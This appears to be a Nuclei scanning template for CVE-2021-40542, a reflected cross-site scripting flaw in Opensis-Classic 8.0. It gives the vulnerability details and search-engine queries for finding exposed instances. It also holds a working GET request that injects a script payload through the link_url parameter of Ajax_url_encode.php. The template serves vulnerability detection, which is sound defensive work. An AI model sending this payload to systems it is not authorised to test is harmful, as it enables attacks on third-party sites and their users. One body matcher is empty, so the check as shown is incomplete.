id: CVE-2021-40542 info: name: Opensis-Classic 8.0 - Cross-Site Scripting author: alph4byt3 severity: medium description: | Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://github.com/OS4ED/openSIS-Classic/issues/189 - https://nvd.nist.gov/vuln/detail/CVE-2021-40542 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40542 cwe-id: CWE-79 epss-score: 0.00342 epss-percentile: 0.71484 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: os4ed product: opensis shodan-query: - http.title:"openSIS" - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve2021,cve,xss,opensis,os4ed http: - method: GET path: - '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402202cc2f7373c80af1c87453ca77a6c642ffc9694f0b651ba72be8790a389c97066022063d045826ec64715d6c6758801bc888a2cbbc225a836a9b7518c2db506143520:922c64590222798bb761d5b6d8e72950